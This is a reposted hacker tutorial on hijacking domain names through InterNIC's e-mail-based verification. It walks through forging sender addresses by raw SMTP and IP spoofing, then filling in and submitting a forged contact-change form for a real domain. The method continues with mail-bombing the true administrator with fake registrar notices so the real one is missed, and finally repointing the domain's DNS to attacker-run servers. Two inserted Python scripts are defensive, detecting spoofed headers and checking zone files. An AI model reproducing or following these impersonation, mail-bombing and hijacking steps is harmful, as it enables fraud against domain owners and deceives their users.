Thursday, 10 November 2011

Exploiting an InterNIC Verification Flaw for Domain Name Hijacking

by 1sn0 (isno@etang.com)

I. Introduction

Internet domain names are not secure and are easily hijacked. For example, 163.net was hijacked a few days ago and pointed at a different IP address; when users connected, they thought 163.net itself had been hacked. In fact this was not 163.net's fault: it was caused by a flaw in the identity verification used by the international domain registrar InterNIC.

II. How InterNIC authenticates user requests

Let us first look at the four authentication methods InterNIC uses:

MAILFROM: the most common method. Identity is verified by the Administrator's e-mail address given when the domain was registered.

CRYPT: the request may come from any e-mail address, but it must carry a password encrypted with the standard UNIX crypt(). The password is set at registration time.

PGP: the domain registrant's PGP public key is stored in InterNIC's database, and every request must be digitally signed with the corresponding private key.

FAX: the company's letterhead or official seal is sent over by fax.

None of these authentication methods is very secure. The corresponding attacks are described below.

III. The corresponding attacks

1. MAILFROM is the most common verification method and also the easiest to defeat. The usual approach is to forge the Administrator's e-mail address and send a message requesting a change to the domain registration information. Because SENDMAIL does not check the actual sender's e-mail address, we can very easily forge a message that appears to come from any address. Of course, such a message is not completely forged, as the following method shows:
telnet phunc.com 25
Trying 209.249.172.58...
Connected to phunc.com (209.249.172.58).
Escape character is '^]'.
220 darkness.phunc.com ESMTP Sendmail 8.9.2/8.9.2; Wed, 17 Mar 1999 12:01:25 -0800 (PST)
>> HELO phunc.com
250 darkness.phunc.com Hello phunc.wsmg.digex.net [207.87.17.101], pleased to meet you
>> MAIL FROM:isno@etang.com        # the sender's e-mail address is forged here
250 isno@etang.com... Sender ok
>> RCPT TO:knight@phunc.com
250 knight@phunc.com... Recipient ok
>> DATA
354 Enter mail, end with "." on a line by itself
>> I am isno.
>> -isno
>> isno@etang.com
>> .
250 MAA36653 Message accepted for delivery
>> QUIT
221 darkness.phunc.com closing connection
Connection closed by foreign host.

Of course, we could just as well use mail-forging software to do this. I generally use Kaboom!; every e-mail bomber has this feature.

Although the sender's e-mail address is forged this way, the forgery is not complete: the recipient can view the raw message and see the actual sender's IP. For example, the forged message from the example above looks like this to the recipient:
Date: Wed, 17 Mar 1999 12:01:40 -0800 (PST)
From: isno@etang.com
To: undisclosed-recipients:;

I am isno.
-isno

But if the recipient looks at the raw message, he will see:
Return-Path:
Received: from phunc.com (phunc.wsmg.digex.net [207.87.17.101])
        by darkness.phunc.com (8.9.2/8.9.2) with SMTP id MAA36653
        for knight@phunc.com; Wed, 17 Mar 1999 12:01:40 -0800 (PST)
        (envelope-from bob@vila.com)
Date: Wed, 17 Mar 1999 12:01:40 -0800 (PST)
From: isno@etang.com
Message-Id: <199903172001.MAA36653@darkness.phunc.com>
To: undisclosed-recipients:;

I am isno.
-isno


phunc.wsmg.digex.net reveals the sender's actual address. Completely forging the sending address requires IP spoofing; there is a dedicated program for this, and it is used like this:

# spoofmail -f clinton@whitehouze.gov -h www.whitehouze.gov -t knight@phunc.com -m phunc.com
Originator : clinton@whitehouze.gov
Fakehost : www.whitehouze.gov
Mail To : knight@phunc.com
Mail Server: phunc.com

Enter your message ending with a period on a line by itself:
Hi knight. I am Bill, your president. I wanted to thank
you for your recent shipment of cigars. -Bill
.
Guessing SYN/ACK...108400.
Synflooding www.whitehouze.gov...
Connecting as www.whitehouze.gov to phunc.com.
Sending mail... Sent.
Synflooding stopped. Connection closed.
#

This forges a message from Clinton, and even the raw headers show no flaw:

Return-Path:
Received: from phunc.com (www.whitehouze.gov [209.81.9.231])
        by darkness.phunc.com (8.9.2/8.9.2) with SMTP id MAA36653
        for knight@phunc.com; Wed, 17 Mar 1999 12:01:40 -0800 (PST)
        (envelope-from clinton@whitehouze.gov)
Date: Wed, 17 Mar 1999 12:01:40 -0800 (PST)
From: clinton@whitehouze.gov
Message-Id: <199903172001.MAA36653@darkness.phunc.com>
To: undisclosed-recipients:;

Hi knight. I am Bill, your president. I wanted to thank
you for your recent shipment of cigars. -Bill

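As an added example (not part of the original article), the following Python script looks at the two forged messages above from the receiving side: it unfolds the headers of both messages, re-typed here as constructed samples, and reports where the From: line disagrees with what the receiving Sendmail recorded (envelope-from, HELO name, reverse DNS of the connecting host). The IP-spoofed variant shows the limit of header forensics: only the HELO mismatch remains.

```python
"""Spot spoofed-sender mail by cross-checking the headers shown above.

Added example, not the article's own code: it parses the raw headers the
receiving Sendmail stamped on the message (Received, envelope-from) and
compares them with the From: line the sender chose.
"""
import re
from typing import List, Tuple

# Constructed sample modelled on the first forged message: envelope sender
# and connecting host both differ from the claimed From: address.
FORGED_VIA_SMTP = """Return-Path: <>
Received: from phunc.com (phunc.wsmg.digex.net [207.87.17.101])
\tby darkness.phunc.com (8.9.2/8.9.2) with SMTP id MAA36653
\tfor knight@phunc.com; Wed, 17 Mar 1999 12:01:40 -0800 (PST)
\t(envelope-from bob@vila.com)
Date: Wed, 17 Mar 1999 12:01:40 -0800 (PST)
From: isno@etang.com
Message-Id: <199903172001.MAA36653@darkness.phunc.com>
To: undisclosed-recipients:;

I am isno.
-isno
"""

# Constructed sample modelled on the second forged message, where the
# connecting IP itself was spoofed so reverse DNS and envelope look right.
FORGED_VIA_IP_SPOOF = """Return-Path: <>
Received: from phunc.com (www.whitehouze.gov [209.81.9.231])
\tby darkness.phunc.com (8.9.2/8.9.2) with SMTP id MAA36653
\tfor knight@phunc.com; Wed, 17 Mar 1999 12:01:40 -0800 (PST)
\t(envelope-from clinton@whitehouze.gov)
Date: Wed, 17 Mar 1999 12:01:40 -0800 (PST)
From: clinton@whitehouze.gov
Message-Id: <199903172001.MAA36653@darkness.phunc.com>
To: undisclosed-recipients:;

Hi knight. I am Bill, your president.
"""

# "from <HELO name> (<reverse DNS> [<IP>])" as Sendmail writes it
RECEIVED_RE = re.compile(
    r"from\s+(?P<helo>\S+)\s+\((?P<rdns>[^\s\[\]]+)?\s*\[(?P<ip>[^\]]+)\]\)",
    re.IGNORECASE,
)
ENVELOPE_RE = re.compile(r"\(envelope-from\s+<?([^\s<>)]+)>?\)", re.IGNORECASE)


def parse_headers(raw: str) -> List[Tuple[str, str]]:
    """Unfold RFC 822 headers into (name, value) pairs; stops at the body."""
    headers: List[Tuple[str, str]] = []
    for line in raw.splitlines():
        if line == "":
            break                              # blank line ends the header block
        if line[0] in " \t" and headers:       # folded continuation line
            name, value = headers[-1]
            headers[-1] = (name, value + " " + line.strip())
        elif ":" in line:
            name, value = line.split(":", 1)
            headers.append((name.strip().lower(), value.strip()))
    return headers


def domain_of(address: str) -> str:
    return address.rsplit("@", 1)[-1].strip("<> ").lower()


def related(a: str, b: str) -> bool:
    """True when one host name is the other or a subdomain of it."""
    a, b = a.lower(), b.lower()
    return a == b or a.endswith("." + b) or b.endswith("." + a)


def analyze(raw: str) -> List[Tuple[str, str]]:
    """Return (code, detail) findings for a raw message; empty means consistent."""
    headers = parse_headers(raw)
    received = [v for n, v in headers if n == "received"]
    header_from = next((v for n, v in headers if n == "from"), "")
    if not received or not header_from:
        return [("INCOMPLETE", "no Received or From header to compare")]
    # The last Received line was stamped by the first receiving MTA,
    # i.e. the hop that actually talked to the sender.
    first_hop = received[-1]
    m = RECEIVED_RE.search(first_hop)
    if not m:
        return [("INCOMPLETE", "could not parse the first-hop Received header")]
    helo, rdns, ip = m.group("helo"), m.group("rdns") or "", m.group("ip")
    envelope = ENVELOPE_RE.search(first_hop)
    from_domain = domain_of(header_from)
    findings: List[Tuple[str, str]] = []
    if envelope is None:
        findings.append(("NO_ENVELOPE", "first hop recorded no envelope-from"))
    elif not related(from_domain, domain_of(envelope.group(1))):
        findings.append(("ENVELOPE_MISMATCH",
                         f"From: {from_domain} vs envelope-from {domain_of(envelope.group(1))}"))
    if not related(helo, rdns or helo):
        findings.append(("HELO_MISMATCH", f"HELO {helo} vs reverse DNS {rdns} for {ip}"))
    if rdns and not related(from_domain, rdns):
        findings.append(("FROM_HOST_MISMATCH",
                         f"From: {from_domain} vs connecting host {rdns}"))
    return findings


if __name__ == "__main__":
    for label, sample in (("SMTP forgery", FORGED_VIA_SMTP),
                          ("IP-spoofed forgery", FORGED_VIA_IP_SPOOF)):
        print(label)
        for code, detail in analyze(sample) or [("OK", "headers consistent")]:
            print(f"  {code}: {detail}")
```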
Ahem... this seems to have wandered off topic. I was supposed to be talking about domain hijacking, so how did I end up on forging e-mail? Actually none of this trouble is needed: simply forging one e-mail with a mail bomber is enough to fool InterNIC. I will describe the concrete procedure in detail later.

2. There is no good way to deal with CRYPT-encrypted passwords; this verification method appears to be reasonably secure :-<

3. PGP signature verification looks very secure, doesn't it? But InterNIC is simply... If you send InterNIC a request letter with a forged e-mail address and no PGP signature, guess what happens? Does InterNIC reject the request? Ha, InterNIC completely ignores the missing PGP signature and authenticates on MAILFROM alone. This has to be called InterNIC's biggest mistake.

4. Fax verification is also easy to exploit; it takes some social engineering skill, which, frankly, is just lying! I will not discuss it here; figure it out yourself...

IV. Concrete steps for domain hijacking with a forged e-mail address

Because MAILFROM verification simply checks the administrator's e-mail address, it is easy to exploit, and as noted above, PGP verification can be attacked by the same MAILFROM method. The concrete method of domain hijacking using forged e-mail is described below.

Tools required:

An anonymous mailer or mail bomb tool; a browser such as IE; a mailbox at any free e-mail provider, such as hotmail.com.

In the following example we assume the domain to be hijacked is wi2000.org. Let's go!

First connect to networksolutions.com with a browser, click the "Who Is" button, enter the domain to look up, here wi2000.org, and click "Search".

WHOIS then displays the following domain information:

___________________________________________________________
Registrant:
WI2000 (WI24-DOM)
Blixered 1
Goteborg, Lila Edet 46394
SE

Domain Name: WI2000.ORG

Administrative Contact:
MICKE, ANDERSSON (AMM367) HACKEDINDUSTRIES@HOTMAIL.COM
545326-3445 (FAX) 545326-3445
Technical Contact, Zone Contact:
Jason, Berresford (BJE41) jasonb@MOUNTAINCABLE.NET
1-(905)-765-5212
Billing Contact:
MICKE, ANDERSSON (AMM367) HACKEDINDUSTRIES@HOTMAIL.COM
545326-3445 (FAX) 545326-3445

Record last updated on 22-Jan-2000.
Record created on 19-Dec-1999.
Database last updated on 3-Feb-2000 14:29:53 EST.

Domain servers in listed order:

NS1.CAN-HOST.COM 24.215.1.6
NS2.MOUNTAINCABLE.NET 24.215.0.12
____________________________________________________________

Now we take complete control of the domain by changing the administrator's contact information.

This method carries some risk; proceed with caution!

Now for the actual attack, carried out in the following steps:

- Connect to http://www.networksolutions.com/;

- Click "Make Changes";

- Enter the domain name wi2000.org;

- Two buttons appear; click "Expert";

- The next screen shows the title "Select the form that meets your needs";

- Click "Contact Form";

- A form with two fields appears below;

- In the first field enter the administrator's handle (the NIC Handle); in this example wi2000.org's administrator is AMM367;

- In the second field enter the administrator's e-mail address, in this example HACKEDINDUSTRIES@HOTMAIL.COM;

- Change the option to "Modify";

- Now click "Proceed to Contact Information";

- Select "MAIL-FROM" and click "Go on to Contact Data Information";

- You should now see all of the contact information for this domain's administrator;

- In the e-mail address field, change the e-mail to your own fake e-mail address; for example, I changed it to dd@doom.com;

- Click "Proceed to Set Authorization Scheme";

- Once again select "MAIL-FROM" and fill in the administrator's e-mail address, here HACKEDINDUSTRIES@HOTMAIL.COM;

- Set the options at the bottom to "No" and "Generate Contact Form";

- Now you should see a template containing all the information, roughly like this:

_______________________________________________________________________
******************* Please DO NOT REMOVE Version Number **********************

Contact Version Number: 1.0

**************** Please see attached detailed instructions *******************

Authorization
0a. (N)ew (M)odify (D)elete.: Modify
0b. Auth Scheme.............: MAIL-FROM
0c. Auth Info...............:

Contact Information
1a. NIC Handle..............: AMM367
1b. (I)ndividual (R)ole.....: Individual
1c. Name....................: MICKE, ANDERSSON
1d. Organization Name.......: WI2000
1e. Street Address..........: BLIXERED 1
1f. City....................: GOTEBORG
1g. State...................: LILLA EDET
1h. Postal Code.............: 46394
1i. Country.................: SE
1j. Phone Number............: 545326-3445
1k. Fax Number..............: 545326-3445
1l. E-Mailbox...............: dd@doom.com

Notify Information
2a. Notify Updates..........: AFTER-UPDATE
2b. Notify Use..............: AFTER-USE

Authentication
3a. Auth Scheme.............: MAIL-FROM
3b. Auth Info...............: HACKEDINDUSTRIES@HOTMAIL.COM
3c. Public (Y/N)............: NO
______________________________________________________________________

Note: do not click the "Mail this contact form to me!" button at the bottom at this point, or all your work is wasted!

Now copy the template above into your anonymous mailer or mail bomber, but do not send it yet! The most complicated part comes next.

When you send this information to hostmaster@networksolutions.com, the following message is sent to the domain administrator's mailbox:

____________________________________
Subject: [NIC-000128.4r50] Your Mail
__________________________________________________________________________
This is an automatic reply to acknowledge that your message has been
received by hostmaster@networksolutions.com. This acknowledgement is "NOT"
a confirmation that your request has been processed. You will be
notified when it has been completed.

If you should have need to correspond with us regarding this request,
please include the tracking number [NIC-000128.4r50] in the subject.
The easiest way to do this is simply to reply to this message.

If you have not already done so, please come and visit our site via www
browser or ftp and pick-up the latest domain template or review the
Domain Name Registration Service Agreement at the URL's:

Domain Name Registration Service Agreement
http://www.networksolutions.com/legal/service-agreement.html
Domain Name Registration Template
ftp://www.networksolutions.com/templates/domain-template.txt

Regards,
Network Solutions Registration Services

***********************************************

***********************************************
IMPORTANT INFORMATION
***********************************************
On January 15, 2000, Network Solutions introduced Service
Agreement, Version 6.0. All versions of the Service Agreement
template will continue to be accepted and processed until
January 31, 2000. On and after February 1, 2000, please use
the Network Solutions Service Agreement, Version 6.0 template
located at
ftp://www.networksolutions.com/templates/domain-template.txt
for all template requests.

The terms and conditions of the Service Agreement are available
on our Web site at
http://www.networksolutions.com/legal/service-agreement.html.
************************************************

The zone files, which make the Internet work, are normally updated twice
daily, 7 days a week at 5:00 AM and 5:00 PM US Eastern Standard Time.
Requests that are completed before these times will be included in that
12-hour zone file update and will normally begin to take effect within
5-6 hours.

Should you wish to modify or delete an existing domain name registration,
you can do so online, using our Service Agreement. You can change the
registrant's address, replace a contact/agent with a different
contact/agent, or change primary and/or secondary name server information.

To update information about an existing contact, such as postal address,
e-mail address or telephone number, complete and submit the Contact Form
to hostmaster@internic.net. This form is available on our Web site at
www.networksolutions.com

To register or update information about a name server, complete and
submit the Host Form to hostmaster@internic.net. This form is also
available on our Web site.

Network Solutions Registration Services
e-mail: help@networksolutions.com
_______________________________________________________________________

This message now causes trouble for our attack: as soon as the real administrator reads it he will discover our trick. But there is still a way around it. Use your mail bomber to send 20 to 30 similar messages to the administrator's mailbox. When he sees twenty or thirty near-identical messages he will assume someone is playing a prank with a mail bomber and will usually delete them all, and then we are safe.

Even if he does reply to these messages, he will usually get the tracking number wrong; here the tracking number is [NIC-000128.4r50]. Of course, when bombing him you must not use the real tracking number; forge several different ones. Here are some common-looking tracking numbers:

[NIC-000127.5089]
[NIC-000128.4rg7]
[NIC-000128.523f]
[NIC-000127.53d0]
[NIC-000129.r609]
[NIC-000128.3f6y]
[NIC-000128.5d8t]
[NIC-000127.r509]
[NIC-000128.4r30]
[NIC-000127.d307]
_____

Note: change these numbers not only in the subject line but also in the body of the message.

In this example you should impersonate hostmaster@internic.net and send the e-mail to HACKEDINDUSTRIES@HOTMAIL.COM, with the subject and content described above.

After you have sent him 10 to 15 messages, stop. Now, impersonating HACKEDINDUSTRIES@HOTMAIL.COM, send a forged reply to hostmaster@networksolutions.com with the following content:

_______________________________________________________________________
******************* Please DO NOT REMOVE Version Number **********************

Contact Version Number: 1.0

**************** Please see attached detailed instructions *******************

Authorization
0a. (N)ew (M)odify (D)elete.: Modify
0b. Auth Scheme.............: MAIL-FROM
0c. Auth Info...............:

Contact Information
1a. NIC Handle..............: AMM367
1b. (I)ndividual (R)ole.....: Individual
1c. Name....................: MICKE, ANDERSSON
1d. Organization Name.......: WI2000
1e. Street Address..........: BLIXERED 1
1f. City....................: GOTEBORG
1g. State...................: LILLA EDET
1h. Postal Code.............: 46394
1i. Country.................: SE
1j. Phone Number............: 545326-3445
1k. Fax Number..............: 545326-3445
1l. E-Mailbox...............: dd@doom.com

Notify Information
2a. Notify Updates..........: AFTER-UPDATE
2b. Notify Use..............: AFTER-USE

Authentication
3a. Auth Scheme.............: MAIL-FROM
3b. Auth Info...............: HACKEDINDUSTRIES@HOTMAIL.COM
3c. Public (Y/N)............: NO
______________________________________________________________________

Note: do not put anything in the subject line of this message!

Then send this message, and only one copy; do not mail-bomb hostmaster@networksolutions.com.

Then continue bombing HACKEDINDUSTRIES@HOTMAIL.COM until 30 to 35 bombs with different tracking numbers have been sent.

Now just wait. Usually after 24 hours you are the administrator of wi2000.org and can do whatever you like with the domain.

For example, to point wi2000.org at a different IP address, follow these steps:

- Open a browser and enter http://www.networksolutions.com/cgi-bin/makechanges/change-registrar;

- Enter the target, e.g. wi2000.org;

- Enter the relevant information and give the Administrative contact's e-mail address, which is now isno@etang.com;

- Change the target's DNS servers to DNS servers you control; for example, I control ns.some.com, so set the DNS server to ns.some.com;

- Confirm;

- After 2 or 3 minutes you receive a message from registrar@netsol.com asking you to confirm.

- Confirm it.

Now the name server of wi2000.org has been changed to ns.some.com, so we go to ns.some.com and edit the zone file. To find where the zone files live, first look at /etc/named.boot, and add the following line to it:

primary wi2000.org wi2000.hosts

Find the line directory "/var/named"; it means the zone files are kept under /var/named. Create a file wi2000.hosts under /var/named with the following content:

@   IN  SOA ns.some.com. cf.pub.some.com. (   ; MNAME is the primary server, ns.some.com
            1999111802   ; serial
            10800        ; refresh
            3600         ; retry
            604800       ; expire
            86400 )      ; minimum
@   IN  NS  ns.some.com.
www IN  A   204.192.96.173

204.192.96.173 is another host under our control. Then restart the name server from the command line:

# /etc/rc.d/init.d/named restart

Note: all of the above assumes that the name server on ns.some.com is BIND.
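As an added example, not code from the article or from BIND, here is a small Python checker for the wi2000.hosts zone format shown above, together with a delegation diff that compares the NS names from the WHOIS record earlier on the page against what is now published, which is how the registrant would notice the name-server change. The sample zone is constructed and keeps the SOA MNAME on a different host than the NS record so the check has something to report.

```python
"""Lint a BIND master file like the one above and spot delegation changes.

Added example, not the article's or BIND's own code. It parses the minimal
zone syntax shown (SOA in parentheses, '@', relative names) so the apex
records can be cross-checked, and diffs an expected NS set against an
observed one.
"""
from typing import Dict, List, Set, Tuple

Record = Tuple[str, str, List[str]]

# Constructed sample modelled on the wi2000.hosts file above; the SOA MNAME
# deliberately names a different host than the NS record so the lint fires.
ZONE_TEXT = """\
@ IN SOA ns.some.net. cf.pub.some.com. (
        1999111802 ; serial
        10800      ; refresh
        3600       ; retry
        604800     ; expire
        86400 )    ; minimum
@   IN NS ns.some.com.
www IN A  204.192.96.173
"""
ZONE_FIXED = ZONE_TEXT.replace("ns.some.net.", "ns.some.com.")


def absolutize(name: str, origin: str) -> str:
    """Expand '@' and relative names the way named does for this origin."""
    if name == "@":
        return origin
    return name if name.endswith(".") else f"{name}.{origin}"


def parse_zone(text: str, origin: str) -> List[Record]:
    """Return (owner, type, rdata) records; handles ';' comments, '(' ')'
    continuation, blank-owner shorthand, optional TTL and class IN."""
    origin = origin.rstrip(".") + "."
    records: List[Record] = []
    logical: List[str] = []
    last_owner, depth = origin, 0
    for raw in text.splitlines():
        line = raw.split(";", 1)[0]            # strip trailing comment
        if not line.strip() and depth == 0:
            continue
        logical.append(line)
        depth += line.count("(") - line.count(")")
        if depth > 0:                          # still inside parentheses
            continue
        tokens = " ".join(logical).replace("(", " ").replace(")", " ").split()
        leading_blank = logical[0][:1] in (" ", "\t")
        logical = []
        if not tokens:
            continue
        owner = last_owner if leading_blank else absolutize(tokens.pop(0), origin)
        last_owner = owner
        while tokens and (tokens[0].upper() == "IN" or tokens[0].isdigit()):
            tokens.pop(0)                      # optional class and TTL
        rtype, rdata = tokens[0].upper(), tokens[1:]
        if rtype in ("NS", "CNAME"):
            rdata[0] = absolutize(rdata[0], origin)
        elif rtype == "SOA":
            rdata[:2] = [absolutize(n, origin) for n in rdata[:2]]
        records.append((owner, rtype, rdata))
    return records


def lint_zone(records: List[Record], origin: str) -> List[str]:
    """Apex consistency checks an operator runs before reloading named."""
    origin = origin.rstrip(".") + "."
    findings: List[str] = []
    soa = [r for r in records if r[0] == origin and r[1] == "SOA"]
    ns = {r[2][0] for r in records if r[0] == origin and r[1] == "NS"}
    if len(soa) != 1:
        findings.append("zone must have exactly one SOA record at the apex")
    if not ns:
        findings.append("zone has no NS record at the apex")
    if soa and ns and soa[0][2][0] not in ns:
        findings.append(f"SOA MNAME {soa[0][2][0]} is not among the apex NS targets {sorted(ns)}")
    for target in sorted(ns):                  # in-zone name servers need glue
        if target.endswith("." + origin) and not any(
                r[0] == target and r[1] == "A" for r in records):
            findings.append(f"in-zone NS {target} has no A record")
    return findings


def delegation_drift(expected: Set[str], observed: Set[str]) -> Dict[str, List[str]]:
    """Compare the NS names a registrant expects with those now published."""
    def norm(names: Set[str]) -> Set[str]:
        return {n.rstrip(".").lower() + "." for n in names}
    exp, obs = norm(expected), norm(observed)
    return {"added": sorted(obs - exp), "removed": sorted(exp - obs)}


if __name__ == "__main__":
    recs = parse_zone(ZONE_TEXT, "wi2000.org")
    for problem in lint_zone(recs, "wi2000.org"):
        print("lint:", problem)
    # NS names from the WHOIS record above versus the new delegation
    print(delegation_drift({"NS1.CAN-HOST.COM", "NS2.MOUNTAINCABLE.NET"},
                           {r[2][0] for r in recs if r[1] == "NS"}))
```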

Now when someone connects to www.wi2000.org through a browser, he is taken to 204.192.96.173. Since 204.192.96.173 is under our control, we can change its home page at will, and everyone thinks www.wi2000.org has been hacked!

Note: the method above only works when the administrator e-mail and the technical contact e-mail registered at InterNIC are different.



References:

A guide to exploiting Network Solution's InterNIC. knight (knight@phunc.com)

Domain Name Robbery (aka Domain-Jacking): A Flaw in InterNIC Authentication Scheme. Lucifer Mirza (lucifermirza@hotmail.com)


Contact me:

e-mail: isno@etang.com
homepage: http://isno.yeah.net
irc: 202.96.137.64:6667 #darksun

My PGP key:


-EOF
